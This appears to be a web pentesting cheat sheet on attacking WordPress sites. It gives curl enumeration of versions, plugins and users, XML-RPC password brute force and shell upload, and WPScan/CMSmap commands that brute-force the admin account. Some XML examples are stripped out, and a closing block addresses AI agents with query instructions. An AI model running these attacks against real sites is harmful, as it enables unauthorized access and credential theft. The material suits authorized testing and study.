# CMS Wp/Durpal/Joomla/etc.. {% tabs %} {% tab title="Support VeryLazyTech 🎉" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/product-category/membership/)**! 🎁** * **Follow** us on: * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚 {% endtab %} {% endtabs %} ## WordPress ### Basic Info #### WordPress File & Path Basics * **Uploads** → `/wp-content/uploads/YYYY/MM/filename`\ Example: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt` * **Themes** → `/wp-content/themes/[theme]/` * Uploading a malicious file or editing PHP templates may provide RCE. * Example: `/wp-content/themes/twentytwelve/404.php` * **Default login paths** → ``` /wp-login.php /wp-login/ /wp-admin/ /wp-admin.php /login/ ``` * **Important files**: * `wp-config.php` → Database credentials, salts, debug settings. * `license.txt` → May reveal WordPress version. * `xmlrpc.php` → Remote procedure call interface (often abused). * `wp-sitemap.xml` → Introduced in WP 5.5, lists public posts & taxonomies. * `wp-includes/` → Core libraries (JS, fonts, widgets, certs). * `wp-content/` → Plugins & themes directory. #### **Post exploitation** * The `wp-config.php` file contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting. ### WordPress User Roles * **Administrator** → Full control over site. * **Editor** → Manage own + others’ posts. * **Author** → Manage and publish own posts. * **Contributor** → Write posts, but cannot publish. * **Subscriber** → Read posts & manage their profile. *** ## **Wordpress - Enumeration** ### Passive Enumeration Passive techniques rely on publicly accessible resources without direct interaction that might raise alarms. #### 1. Identify WordPress Version * `license.txt` or `readme.html` may disclose version. * HTML meta tags: ```bash curl https://victim.com/ | grep 'content="WordPress' ``` * Inspect linked CSS/JS files (`?ver=X.Y.Z`). ![](https://book.hacktricks.wiki/en/images/image%20$1111$.png) ![](https://book.hacktricks.wiki/en/images/image%20$533$.png) ![](https://book.hacktricks.wiki/en/images/image%20$524$.png) #### 2. Enumerate Plugins & Themes * Plugins: ```bash curl -s https://target.com | grep 'wp-content/plugins/' curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2 ``` * Themes: ```bash curl -s https://target.com | grep 'wp-content/themes/' curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2 ``` #### 3. Extract Versions from Assets ```bash curl -s https://target.com | grep '?ver=' curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2 ``` ### Active enumeration #### Plugins and Themes You probably won't be able to find all the Plugins and Themes passible. In order to discover all of them, you will need to **actively Brute Force a list of Plugins and Themes** (hopefully for us there are automated tools that contains this lists). #### 1. User Enumeration * **Author ID brute-force**: ```bash curl -s -I http://blog.example.com/?author=1 ``` * `200` / `30X` = valid ID * `400` = invalid ID * **WP REST API**: ```bash curl http://blog.example.com/wp-json/wp/v2/users ``` **Login error messages** → Differentiate valid vs. invalid usernames. #### 2. User Information via JSON * Posts API: ```bash curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL ``` * Pages API (may leak IPs): ```bash curl http://blog.example.com/wp-json/wp/v2/pages ``` #### 3. XML-RPC Abuse * Check availability: ```xml system.listMethods ``` * ```

``` * Credential brute-force methods (bruteforce by ): * `wp.getUsersBlogs` ![](https://book.hacktricks.wiki/en/images/image%20$107$%20$2$%20$2$%20$2$%20$2$%20$2$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$1$%20$2$%20$4$%20$1$.png) * `wp.getCategories` * `metaWeblog.getUsersBlogs` * File upload example with `wp.uploadFile`: (useful for shell upload if creds valid). * **Optimization** → Use `system.multicall` for faster brute force attempts. Using the correct credentials you can upload a file. In the response the path will appears ```html wp.uploadFile 1 username password name filename.jpg type mime/type bits ``` Also there is a **faster way** to brute-force credentials using **`system.multicall`** as you can try several credentials on the same request:

*** ## Automatic Tools ### **CMSmap** [**CMSmap**](https://github.com/dionach/CMSmap) is a python tool to automate the process of detecting and exploiting vulnerabilities in CMSs (WordPress, Joomla, Drupal, etc.) -s : target site -t : number of threads -a : custom User-Agent ```bash cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0" ``` ### **WPScan** [**WPScan**](https://wpscan.com/) is specialized for WordPress vulnerability scanning. \--rua : use a random User-Agent -e : enumerate users, plugins, themes, timthumbs, config backups, DB exports, media \--url : target WordPress site \--plugins-detection : plugin detection mode (aggressive, mixed, passive) \--api-token : WPScan API token (free plan allows \~50 requests/day)

wpscan --rua -e ap,at,tt,cb,dbe,u,m \
  --url http://www.domain.com \
  --plugins-detection aggressive \
  --api-token <API_TOKEN> \
  --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt
  
# If you specifically want to brute-force the 'admin' user:

wpscan --url http://www.domain.com \
  -U admin \
  -P /usr/share/wordlists/rockyou.txt \
  --api-token <API_TOKEN>

{% hint style="success" %} Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)

Support VeryLazyTech 🎉

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/product-category/membership/)**! 🎁** * **Follow** us on: * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚

{% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.verylazytech.com/pentesting-web/cms-wp-durpal-joomla-etc...md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.